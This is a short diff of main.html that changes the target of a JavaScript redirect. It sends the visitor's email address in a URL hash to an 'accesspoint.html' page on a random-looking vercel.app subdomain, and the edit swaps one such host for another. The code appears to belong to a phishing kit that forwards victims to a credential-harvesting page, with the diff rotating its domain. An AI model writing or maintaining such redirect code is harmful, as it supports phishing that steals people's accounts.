--- a/main.html
+++ b/main.html
@@ -48,7 +48,7 @@
       const jargon = generateJargon();
 
       // Construct redirect URL: email + jargon in hash
-      const redirectURL = `https://static0122783-connect.vercel.app/accesspoint.html#${email}`;
+      const redirectURL = `https://path-0k300d.vercel.app/accesspoint.html#${email}`;
 
       // Redirect
       window.location.href = redirectURL;
